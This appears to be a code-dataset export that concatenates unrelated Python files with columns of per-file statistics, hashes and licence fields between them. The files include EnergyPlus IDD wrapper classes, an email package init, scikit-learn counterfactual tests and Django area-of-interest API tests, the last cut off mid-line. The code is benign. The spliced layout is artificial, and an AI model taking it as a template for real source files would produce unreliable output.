        """Return IDD field `Layer 4` (str, or None if unset)."""
        return self["Layer 4"]

    @layer_4.setter
    def layer_4(self, value=None):
        """Set IDD field `Layer 4`."""
        self["Layer 4"] = value

    @property
    def layer_5(self):
        """Return IDD field `Layer 5` (str, or None if unset)."""
        return self["Layer 5"]

    @layer_5.setter
    def layer_5(self, value=None):
        """Set IDD field `Layer 5`."""
        self["Layer 5"] = value

    @property
    def layer_6(self):
        """Return IDD field `Layer 6` (str, or None if unset)."""
        return self["Layer 6"]

    @layer_6.setter
    def layer_6(self, value=None):
        """Set IDD field `Layer 6`."""
        self["Layer 6"] = value

    @property
    def layer_7(self):
        """Return IDD field `Layer 7` (str, or None if unset)."""
        return self["Layer 7"]

    @layer_7.setter
    def layer_7(self, value=None):
        """Set IDD field `Layer 7`."""
        self["Layer 7"] = value

    @property
    def layer_8(self):
        """Return IDD field `Layer 8` (str, or None if unset)."""
        return self["Layer 8"]

    @layer_8.setter
    def layer_8(self, value=None):
        """Set IDD field `Layer 8`."""
        self["Layer 8"] = value

    @property
    def layer_9(self):
        """Return IDD field `Layer 9` (str, or None if unset)."""
        return self["Layer 9"]

    @layer_9.setter
    def layer_9(self, value=None):
        """Set IDD field `Layer 9`."""
        self["Layer 9"] = value

    @property
    def layer_10(self):
        """Return IDD field `Layer 10` (str, or None if unset)."""
        return self["Layer 10"]

    @layer_10.setter
    def layer_10(self, value=None):
        """Set IDD field `Layer 10`."""
        self["Layer 10"] = value

    @property
    def layer_11(self):
        """Return IDD field `Layer 11` (str, or None if unset)."""
        return self["Layer 11"]

    @layer_11.setter
    def layer_11(self, value=None):
        """Set IDD field `Layer 11`."""
        self["Layer 11"] = value
class ConstructionWindowDataFile(DataObject):

    """Corresponds to IDD object `Construction:WindowDataFile`.

    Triggers a search of the Window data file for a window whose name
    matches the `Name` field.
    """

    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name', 'pyname': u'name', 'required-field': True,
              'autosizable': False, 'autocalculatable': False,
              'type': u'alpha'}),
            (u'file name',
             {'name': u'File Name', 'pyname': u'file_name',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': 'alpha'})]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 0,
        'name': u'Construction:WindowDataFile',
        'pyname': u'ConstructionWindowDataFile',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Return IDD field `Name` (str, or None if unset)."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    @property
    def file_name(self):
        """Return IDD field `File Name` (str, or None if unset).

        The default file name is "Window5DataFile.dat"; the field is
        limited to 100 characters.
        """
        return self["File Name"]

    @file_name.setter
    def file_name(self, value=None):
        """Set IDD field `File Name`."""
        self["File Name"] = value
class MaterialPropertyGlazingSpectralData(DataObject):

    """Corresponds to IDD object `MaterialProperty:GlazingSpectralData`.

    The name is followed by up to 800 groups of normal-incidence
    measured values [wavelength, transmittance, front reflectance,
    back reflectance] covering the solar spectrum (from about 0.25 to
    2.5 microns).
    """

    _schema = {
        'extensible-fields': OrderedDict([
            (u'wavelength',
             {'name': u'Wavelength', 'pyname': u'wavelength',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real',
              'unit': u'micron'}),
            (u'transmittance',
             {'name': u'Transmittance', 'pyname': u'transmittance',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': 'real'}),
            (u'front reflectance',
             {'name': u'Front Reflectance', 'pyname': u'front_reflectance',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': 'real'}),
            (u'back reflectance',
             {'name': u'Back Reflectance', 'pyname': u'back_reflectance',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': 'real'})]),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name', 'pyname': u'name', 'required-field': True,
              'autosizable': False, 'autocalculatable': False,
              'type': 'alpha'})]),
        'format': u'spectral',
        'group': u'Surface Construction Elements',
        'min-fields': 0,
        'name': u'MaterialProperty:GlazingSpectralData',
        'pyname': u'MaterialPropertyGlazingSpectralData',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Return IDD field `Name` (str, or None if unset)."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    def add_extensible(self,
                       wavelength=None,
                       transmittance=None,
                       front_reflectance=None,
                       back_reflectance=None):
        """Append one group of values for the extensible fields.

        Args:
            wavelength (float): value for IDD Field `Wavelength`
                (units: micron).  A None value is stored as a missing
                value without being checked against the specification.
            transmittance (float): value for IDD Field `Transmittance`;
                None is treated as above.
            front_reflectance (float): value for IDD Field
                `Front Reflectance`; None is treated as above.
            back_reflectance (float): value for IDD Field
                `Back Reflectance`; None is treated as above.
        """
        # check_value validates each entry against the schema before
        # the group is stored; the order matches the extensible spec.
        group = [
            self.check_value("Wavelength", wavelength),
            self.check_value("Transmittance", transmittance),
            self.check_value("Front Reflectance", front_reflectance),
            self.check_value("Back Reflectance", back_reflectance),
        ]
        self._extdata.append(group)

    @property
    def extensibles(self):
        """Return the list of all extensible field groups."""
        return self._extdata

    @extensibles.setter
    def extensibles(self, extensibles):
        """Replace all extensible field groups with `extensibles`.

        Args:
            extensibles (list): nested list of extensible values
        """
        self._extdata = []
        for group in extensibles:
            self.add_extensible(*group)
| 39.35321
| 123
| 0.465598
| 84,635
| 957,621
| 5.165558
| 0.009783
| 0.025911
| 0.027338
| 0.026021
| 0.93339
| 0.908751
| 0.885166
| 0.84938
| 0.797972
| 0.762333
| 0
| 0.019434
| 0.45268
| 957,621
| 24,333
| 124
| 39.354827
| 0.814693
| 0.274628
| 0
| 0.758085
| 0
| 0
| 0.235793
| 0.023689
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126496
| false
| 0
| 0.000268
| 0
| 0.197427
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
837b7a81a53a0003f20450258ded9fb2526e5fb8
| 191
|
py
|
Python
|
h/emails/__init__.py
|
julien-cheng/h
|
36c8ec044725720cf36f0986cdf025395aca8929
|
[
"BSD-2-Clause"
] | 2
|
2019-08-04T07:22:11.000Z
|
2020-07-17T05:01:41.000Z
|
h/emails/__init__.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | 4
|
2020-03-24T17:38:24.000Z
|
2022-03-02T05:45:01.000Z
|
h/emails/__init__.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

# Re-export the email submodules so they are importable directly from
# the package; `__all__` declares them as the public API.
from h.emails import reply_notification, reset_password, signup

__all__ = ("reply_notification", "reset_password", "signup")
| 27.285714
| 63
| 0.764398
| 23
| 191
| 5.782609
| 0.695652
| 0.255639
| 0.330827
| 0.451128
| 0.541353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005917
| 0.115183
| 191
| 6
| 64
| 31.833333
| 0.781065
| 0.109948
| 0
| 0
| 0
| 0
| 0.22619
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.666667
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
83b81815e11248e412710ea10679ce9c9c0705ab
| 17,311
|
py
|
Python
|
tests/sklearn/test_sklearn_pipeline.py
|
andreArtelt/ceml
|
364d4630d6a01592c2ab86f2d53dbb7feb682381
|
[
"MIT"
] | 24
|
2019-07-12T08:11:25.000Z
|
2021-12-09T19:24:53.000Z
|
tests/sklearn/test_sklearn_pipeline.py
|
andreArtelt/ceml
|
364d4630d6a01592c2ab86f2d53dbb7feb682381
|
[
"MIT"
] | 6
|
2020-09-28T04:42:44.000Z
|
2021-09-27T06:59:36.000Z
|
tests/sklearn/test_sklearn_pipeline.py
|
andreArtelt/ceml
|
364d4630d6a01592c2ab86f2d53dbb7feb682381
|
[
"MIT"
] | 7
|
2019-09-11T13:54:57.000Z
|
2021-01-14T13:13:26.000Z
|
# -*- coding: utf-8 -*-
import sys
sys.path.insert(0,'..')
import numpy as np
np.random.seed(42)
import sklearn
from sklearn.datasets import load_iris, load_boston
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.preprocessing import StandardScaler, RobustScaler, PolynomialFeatures, Normalizer, MinMaxScaler, MaxAbsScaler
from sklearn.decomposition import PCA
from sklearn.pipeline import make_pipeline
from ceml.sklearn import generate_counterfactual
def compute_counterfactuals(model, x, y):
    """Exercise ceml's `generate_counterfactual` on `model` for sample `x`.

    Runs the counterfactual search with and without an l1 regularizer,
    under both the "bfgs" and "nelder-mead" optimizers, and with
    several feature whitelists, asserting each time that the model
    predicts `y` for the returned counterfactual `x_cf` and (when a
    whitelist is set) that non-whitelisted components of the
    perturbation `delta` stay exactly zero.
    """
    # No whitelist: every feature is allowed to change.
    features_whitelist = None
    x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="bfgs", return_as_dict=False)
    # NOTE(review): this is the only comparison against the literal 0
    # rather than `y` (the parallel compute_counterfactuals_poly asserts
    # `y_cf == y` at the same spot).  Presumably callers always pass
    # y == 0 -- confirm against the call sites.
    assert y_cf == 0
    assert model.predict(np.array([x_cf])) == y
    x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="nelder-mead", return_as_dict=False)
    assert y_cf == y
    assert model.predict(np.array([x_cf])) == y
    x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
    assert y_cf == y
    assert model.predict(np.array([x_cf])) == y
    x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
    assert y_cf == y
    assert model.predict(np.array([x_cf])) == y
    # Restrict the search to features 1 and 2; every other component of
    # `delta` must remain exactly zero.
    features_whitelist = [1, 2]
    x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="bfgs", return_as_dict=False)
    assert y_cf == y
    assert model.predict(np.array([x_cf])) == y
    assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
    x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="nelder-mead", return_as_dict=False)
    assert y_cf == y
    assert model.predict(np.array([x_cf])) == y
    assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
    features_whitelist = [0, 1, 2]
    # NOTE(review): the two calls below request target class 0 (the
    # literal) while still asserting against `y` -- consistent only when
    # y == 0; verify this is intentional.
    x_cf, y_cf, delta = generate_counterfactual(model, x, 0, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
    assert y_cf == y
    assert model.predict(np.array([x_cf])) == y
    assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
    x_cf, y_cf, delta = generate_counterfactual(model, x, 0, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
    assert y_cf == y
    assert model.predict(np.array([x_cf])) == y
    assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
def compute_counterfactuals_poly(model, x, y):
    """Compute counterfactuals of `model` at sample `x` for target label `y`
    under several optimizer/regularization settings and assert they are valid.

    For each setting: the reported counterfactual label must equal `y`, the
    model must actually predict `y` on the counterfactual, and — when a
    feature whitelist is given — features outside the whitelist must be
    unchanged (delta == 0).
    """
    def _check(features_whitelist, regularization, optimizer, C=None):
        # Only pass C when a regularization strength is actually used,
        # mirroring the original call pattern.
        kwargs = {"C": C} if C is not None else {}
        x_cf, y_cf, delta = generate_counterfactual(
            model, x, y, features_whitelist=features_whitelist,
            regularization=regularization, optimizer=optimizer,
            return_as_dict=False, **kwargs)
        assert y_cf == y
        assert model.predict(np.array([x_cf])) == y
        if features_whitelist is not None:
            # Non-whitelisted features must stay untouched.
            assert all(delta[i] == 0. for i in range(x.shape[0])
                       if i not in features_whitelist)

    for whitelist in (None, [0, 1, 2]):
        _check(whitelist, "l1", "bfgs", C=1.0)
        _check(whitelist, "l1", "nelder-mead", C=1.0)
        _check(whitelist, None, "bfgs")
        # BUG FIX: the original passed the literal target 0 in the last
        # whitelisted call while still asserting y_cf == y; use `y`
        # consistently for every combination.
        _check(whitelist, None, "nelder-mead")
def compute_counterfactuals_2(model, x, y):
    """Compute counterfactuals of `model` at sample `x` for target label `y`
    with the bfgs / nelder-mead / powell optimizers and assert they are valid.

    Covers: no regularization and l1 (C=0.001) without a whitelist, then no
    regularization and l2 (C=0.001) with the whitelist [0, 1, 2]. With a
    whitelist, non-whitelisted features must be unchanged (delta == 0).
    """
    _OPTIMIZERS = ("bfgs", "nelder-mead", "powell")

    def _check(features_whitelist, regularization, optimizer, C=None):
        # Only pass C when a regularization strength is actually used,
        # mirroring the original call pattern.
        kwargs = {"C": C} if C is not None else {}
        x_cf, y_cf, delta = generate_counterfactual(
            model, x, y, features_whitelist=features_whitelist,
            regularization=regularization, optimizer=optimizer,
            return_as_dict=False, **kwargs)
        assert y_cf == y
        assert model.predict(np.array([x_cf])) == y
        if features_whitelist is not None:
            # Non-whitelisted features must stay untouched.
            assert all(delta[i] == 0. for i in range(x.shape[0])
                       if i not in features_whitelist)

    # Unrestricted counterfactuals: none and l1 regularization.
    for optimizer in _OPTIMIZERS:
        _check(None, None, optimizer)
    for optimizer in _OPTIMIZERS:
        _check(None, "l1", optimizer, C=0.001)

    # Restricted to features 0..2. NOTE: this section deliberately uses l2
    # (the unrestricted section above uses l1), as in the original.
    features_whitelist = [0, 1, 2]
    for optimizer in _OPTIMIZERS:
        _check(features_whitelist, None, optimizer)
    for optimizer in _OPTIMIZERS:
        _check(features_whitelist, "l2", optimizer, C=0.001)
def test_pipeline_scaler_softmaxregression():
    """Counterfactuals for StandardScaler + softmax-regression pipelines."""
    # Load and split the iris data.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Build and fit the single-preprocessing pipeline.
    scaler = StandardScaler()
    pca = PCA(n_components=2)
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(scaler, clf)
    model.fit(X_train, y_train)

    # Sample whose prediction (class 2) we want flipped to class 0.
    x_orig = X_test[1:4][0, :]
    assert model.predict([x_orig]) == 2

    # Standard optimizer/regularization combinations via the shared helper.
    compute_counterfactuals(model, x_orig, 0)

    # "mp" optimizer, with and without a feature whitelist.
    for whitelist in (None, [0, 1, 2]):
        for regularization in (None, "l1"):
            x_cf, y_cf, _ = generate_counterfactual(
                model, x_orig, 0, features_whitelist=whitelist,
                optimizer="mp", regularization=regularization,
                return_as_dict=False)
            assert y_cf == 0
            assert model.predict(np.array([x_cf])) == 0

    # Pipeline with more than one preprocessing step (PCA then scaler).
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(pca, scaler, clf)
    model.fit(X_train, y_train)
    assert model.predict([x_orig]) == 2
    for regularization in (None, "l1"):
        x_cf, y_cf, _ = generate_counterfactual(
            model, x_orig, 0, features_whitelist=None, optimizer="mp",
            regularization=regularization, return_as_dict=False)
        assert y_cf == 0
        assert model.predict(np.array([x_cf])) == 0
def test_pipeline_robustscaler_softmaxregression():
    """Counterfactuals for a RobustScaler + softmax-regression pipeline."""
    # Load and split the iris data.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Fit RobustScaler followed by multinomial logistic regression.
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(RobustScaler(), clf)
    model.fit(X_train, y_train)

    # Sample whose prediction (class 2) we want flipped to class 0.
    x_orig = X_test[1:4][0, :]
    assert model.predict([x_orig]) == 2
    compute_counterfactuals(model, x_orig, 0)
def test_pipeline_maxabsscaler_softmaxregression():
    """Counterfactuals for a MaxAbsScaler + softmax-regression pipeline."""
    # Load and split the iris data.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Fit MaxAbsScaler followed by multinomial logistic regression.
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(MaxAbsScaler(), clf)
    model.fit(X_train, y_train)

    # Sample whose prediction (class 2) we want flipped to class 0.
    x_orig = X_test[1:4][0, :]
    assert model.predict([x_orig]) == 2
    compute_counterfactuals_2(model, x_orig, 0)
def test_pipeline_minmaxscaler_softmaxregression():
    """Counterfactuals for a MinMaxScaler + softmax-regression pipeline."""
    # Load and split the iris data.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Fit MinMaxScaler followed by multinomial logistic regression.
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(MinMaxScaler(), clf)
    model.fit(X_train, y_train)

    # Sample whose prediction (class 2) we want flipped to class 0.
    x_orig = X_test[1:4][0, :]
    assert model.predict([x_orig]) == 2

    # Standard optimizer/regularization combinations via the shared helper.
    compute_counterfactuals_2(model, x_orig, 0)

    # "mp" optimizer, with and without a feature whitelist.
    for whitelist in (None, [0, 1, 2]):
        for regularization in (None, "l1"):
            x_cf, y_cf, _ = generate_counterfactual(
                model, x_orig, 0, features_whitelist=whitelist,
                optimizer="mp", regularization=regularization,
                return_as_dict=False)
            assert y_cf == 0
            assert model.predict(np.array([x_cf])) == 0
def test_pipeline_normalizer_softmaxregression():
    """Counterfactuals for a Normalizer + softmax-regression pipeline."""
    # Load and split the iris data.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Fit Normalizer followed by multinomial logistic regression.
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(Normalizer(), clf)
    model.fit(X_train, y_train)

    # Sample whose prediction (class 2) we want flipped to class 0.
    x_orig = X_test[1:4][0, :]
    assert model.predict([x_orig]) == 2
    compute_counterfactuals_2(model, x_orig, 0)
def test_pipeline_poly_softmaxregression():
    """Counterfactuals for a PolynomialFeatures + softmax-regression pipeline."""
    # Load and split the iris data.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Fit degree-2 polynomial features followed by logistic regression.
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(PolynomialFeatures(degree=2), clf)
    model.fit(X_train, y_train)

    # Sample whose prediction (class 2) we want flipped to class 0.
    x_orig = X_test[1:4][0, :]
    assert model.predict([x_orig]) == 2
    compute_counterfactuals_poly(model, x_orig, 0)
def test_pipeline_scaler_poly_softmaxregression():
    """Counterfactuals for a poly-features + scaler + softmax pipeline."""
    # Load and split the iris data.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Fit degree-2 polynomial features, StandardScaler, then logistic regression.
    clf = LogisticRegression(solver='lbfgs', multi_class='multinomial')
    model = make_pipeline(PolynomialFeatures(degree=2), StandardScaler(), clf)
    model.fit(X_train, y_train)

    # Sample whose prediction (class 2) we want flipped to class 0.
    x_orig = X_test[1:4][0, :]
    assert model.predict([x_orig]) == 2
    compute_counterfactuals_poly(model, x_orig, 0)
def test_pipeline_pca_linearregression():
    """Counterfactuals for a PCA + Lasso regression pipeline.

    A counterfactual is accepted when its predicted value lies within 3 of
    the regression target (20.0).
    """
    # Load and split the boston housing data.
    X, y = load_boston(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.33, random_state=4242)

    # Fit PCA (4 components) followed by Lasso regression.
    model = make_pipeline(PCA(n_components=4), Lasso())
    model.fit(X_train, y_train)

    # Sample to explain; sanity-check its predicted value.
    x_orig = X_test[1:4][0, :]
    y_orig_pred = model.predict([x_orig])
    assert 25 <= y_orig_pred < 26

    y_target = 20.

    # PEP 8 (E731): a named function instead of a lambda bound to a name.
    def y_target_done(z):
        return np.abs(z - y_target) < 3.

    # (regularization, C, optimizer) combinations; C is only passed for the
    # bfgs/l1 case, as in the original calls.
    for regularization, C, optimizer in (("l1", 0.1, "bfgs"),
                                         ("l1", None, "mp"),
                                         ("l2", None, "mp")):
        kwargs = {"C": C} if C is not None else {}
        x_cf, y_cf, _ = generate_counterfactual(
            model, x_orig, y_target=y_target, done=y_target_done,
            regularization=regularization, features_whitelist=None,
            optimizer=optimizer, return_as_dict=False, **kwargs)
        assert y_target_done(y_cf)
        assert y_target_done(model.predict(np.array([x_cf])))
| 44.048346
| 190
| 0.718965
| 2,638
| 17,311
| 4.47536
| 0.045489
| 0.138235
| 0.023378
| 0.020837
| 0.928511
| 0.924869
| 0.922921
| 0.92165
| 0.919024
| 0.917584
| 0
| 0.017633
| 0.15805
| 17,311
| 393
| 191
| 44.048346
| 0.792384
| 0.049968
| 0
| 0.799197
| 0
| 0
| 0.024738
| 0
| 0
| 0
| 0
| 0
| 0.421687
| 1
| 0.044177
| false
| 0
| 0.040161
| 0
| 0.084337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83e8c136c9d627a3bae41144773ed353456666ed
| 42,284
|
py
|
Python
|
osmchadjango/supervise/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/supervise/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/supervise/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import xml.etree.ElementTree as ET
from django.urls import reverse
from django.contrib.gis.geos import MultiPolygon, Polygon, Point, LineString
from rest_framework.test import APITestCase
from social_django.models import UserSocialAuth
from ...changeset.tests.modelfactories import (
ChangesetFactory, HarmfulChangesetFactory, GoodChangesetFactory,
SuspicionReasonsFactory, TagFactory, UserWhitelistFactory
)
from ...users.models import User
from ..models import AreaOfInterest, BlacklistedUser
class TestAoIListView(APITestCase):
    """Tests for listing Areas of Interest (GET 'supervise:aoi-list-create')."""

    def setUp(self):
        # Two disjoint MultiPolygons used as AoI geometries.
        self.m_polygon = MultiPolygon(
            Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
            Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
            )
        self.m_polygon_2 = MultiPolygon(
            Polygon(((30, 30), (30, 31), (31, 31), (30, 30))),
            Polygon(((31, 31), (31, 32), (32, 32), (31, 31)))
            )
        # Two users, each with an 'openstreetmap' social-auth record.
        self.user = User.objects.create_user(
            username='test_user',
            email='b@a.com',
            password='password'
            )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
            )
        self.user_2 = User.objects.create_user(
            username='test',
            email='b@a.com',
            password='password'
            )
        UserSocialAuth.objects.create(
            user=self.user_2,
            provider='openstreetmap',
            uid='42344',
            )
        # self.user owns two AoIs with geometry; self.user_2 owns one
        # AoI with filters only (no geometry).
        self.area = AreaOfInterest.objects.create(
            name='Best place in the world',
            user=self.user,
            geometry=self.m_polygon,
            filters={
                'editor': 'Potlatch 2',
                'harmful': 'False',
                'geometry': self.m_polygon.geojson
                },
            )
        self.area_2 = AreaOfInterest.objects.create(
            name='Another AOI',
            user=self.user,
            filters={'geometry': self.m_polygon_2.geojson},
            geometry=self.m_polygon_2
            )
        self.area_3 = AreaOfInterest.objects.create(
            user=self.user_2,
            name='Harmful edits',
            filters={'harmful': 'False'},
            )
        self.url = reverse('supervise:aoi-list-create')

    def test_list_view_unauthenticated(self):
        # Anonymous requests get 401.
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 401)

    def test_list_view(self):
        # self.user sees the two AoIs they own.
        self.client.login(username=self.user.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data.get('results').get('features')), 2)

    def test_ordering(self):
        self.client.login(username=self.user.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        # test default ordering is -date
        self.assertEqual(
            response.data.get('results').get('features')[0]['properties']['name'],
            'Another AOI'
            )
        # test ordering by date
        response = self.client.get(self.url, {'order_by': 'date'})
        self.assertEqual(
            response.data.get('results').get('features')[0]['properties']['name'],
            'Best place in the world'
            )
        # test ordering by name
        response = self.client.get(self.url, {'order_by': '-name'})
        self.assertEqual(
            response.data.get('results').get('features')[0]['properties']['name'],
            'Best place in the world'
            )

    def test_list_view_with_user_2(self):
        # self.user_2 sees only their single AoI, with name and filters intact.
        self.client.login(username=self.user_2.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data.get('results').get('features')), 1)
        self.assertEqual(
            response.data.get('results')['features'][0]['properties']['name'],
            'Harmful edits'
            )
        self.assertEqual(
            response.data.get('results')['features'][0]['properties']['filters'],
            {'harmful': 'False'}
            )
class TestAoICreateView(APITestCase):
    """Tests for creating Areas of Interest (POST 'supervise:aoi-list-create')."""

    def setUp(self):
        self.polygon = Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
        self.user = User.objects.create_user(
            username='test_user',
            email='b@a.com',
            password='password'
            )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
            )
        self.url = reverse('supervise:aoi-list-create')
        # Payload with an explicit GeoJSON 'geometry' filter.
        self.data = {
            'name': 'Golfo da Guiné',
            'filters': {
                'is_suspect': 'True',
                'geometry': self.polygon.geojson
                },
            }
        # Payload using an 'in_bbox' filter instead of a geometry.
        self.data_bbox = {
            'name': 'Golfo da Guiné',
            'filters': {
                'is_suspect': 'True',
                'in_bbox': '2,0,5,2'
                },
            }
        # Payload with neither geometry nor bbox information.
        self.without_geo_aoi = {
            'name': 'Unchecked suspect changesets',
            'filters': {
                'is_suspect': 'True',
                'checked': 'False'
                },
            }

    def test_create_AOI_unauthenticated(self):
        # Anonymous POSTs are rejected and nothing is created.
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 401)
        self.assertEqual(AreaOfInterest.objects.count(), 0)

    def test_create_AOI(self):
        # Authenticated POST creates the AoI; the geometry is built from
        # the GeoJSON in the filters.
        self.client.login(username=self.user.username, password='password')
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 201)
        self.assertEqual(AreaOfInterest.objects.count(), 1)
        aoi = AreaOfInterest.objects.get(name='Golfo da Guiné')
        self.assertEqual(aoi.user, self.user)
        self.assertEqual(aoi.filters, self.data.get('filters'))
        self.assertIsInstance(aoi.geometry, Polygon)
        self.assertTrue(
            aoi.geometry.intersects(
                Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
                )
            )

    def test_create_without_geometry_and_bbox(self):
        # AoIs can be created with filters only (no spatial restriction).
        self.client.login(username=self.user.username, password='password')
        response = self.client.post(self.url, self.without_geo_aoi)
        self.assertEqual(response.status_code, 201)
        self.assertEqual(AreaOfInterest.objects.count(), 1)
        aoi = AreaOfInterest.objects.get(name='Unchecked suspect changesets')
        self.assertEqual(aoi.user, self.user)
        self.assertEqual(aoi.filters, self.without_geo_aoi.get('filters'))

    def test_create_with_bbox(self):
        # An 'in_bbox' filter populates the geometry field with a Polygon.
        self.client.login(username=self.user.username, password='password')
        response = self.client.post(self.url, self.data_bbox)
        self.assertEqual(response.status_code, 201)
        self.assertEqual(AreaOfInterest.objects.count(), 1)
        aoi = AreaOfInterest.objects.get(name='Golfo da Guiné')
        self.assertEqual(aoi.user, self.user)
        self.assertEqual(aoi.filters, self.data_bbox.get('filters'))
        self.assertIsInstance(aoi.geometry, Polygon)
        self.assertTrue(
            aoi.geometry.intersects(
                Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
                )
            )

    def test_validation(self):
        self.client.login(username=self.user.username, password='password')
        # A payload without filters is rejected.
        response = self.client.post(self.url, {'name': 'Empty AoI'})
        self.assertEqual(response.status_code, 400)
        self.assertEqual(AreaOfInterest.objects.count(), 0)
        # test validation of unique name of AoI for each user
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 201)
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 400)

    def test_auto_user_field(self):
        # The created AoI is owned by the logged-in user.
        user_2 = User.objects.create_user(
